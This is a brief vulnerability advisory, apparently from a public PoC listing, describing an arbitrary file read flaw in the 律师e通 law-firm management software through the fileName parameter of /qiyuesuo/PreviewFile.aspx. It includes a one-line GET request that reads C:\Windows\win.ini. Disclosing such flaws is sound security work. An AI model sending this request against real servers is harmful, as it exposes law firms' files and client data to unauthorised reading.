律师e通 /qiyuesuo/PreviewFile.aspx 文件读取漏洞

2026-04-30 律师e通 PoC Public

Description

律师e通是一款专业的律师事务所管理软件。该系统的 /qiyuesuo/PreviewFile.aspx 接口存在文件读取漏洞,攻击者可通过构造恶意 fileName 参数读取服务器上的任意文件。

PoC

GET /qiyuesuo/PreviewFile.aspx?fileName=C:\Windows\win.ini HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities